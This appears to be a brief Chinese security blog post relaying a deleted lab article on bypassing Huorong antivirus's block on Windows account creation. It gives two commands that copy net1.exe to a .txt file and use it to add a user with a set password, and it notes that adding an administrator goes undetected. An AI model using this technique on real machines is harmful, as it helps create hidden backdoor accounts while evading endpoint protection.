论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理
源自于某安全实验室发文,文章出来一小时内就被删啦,大致内容如下

正常添加net和net1拦截如下

文章其实实际就是火绒加用户的绕过方式,也并非火绒存在漏洞,火绒官方都发文了!添加用户最终效果如下
copy c:\windows\system32\net1.exe  aaa.txt
aaa.txt user y11 Aa123456@@@ /add

其实也就只检测了加用户,加管理是不会有告警的

posted on 2021-03-05 19:36  Yangsir34  阅读(1827)  评论(0编辑  收藏  举报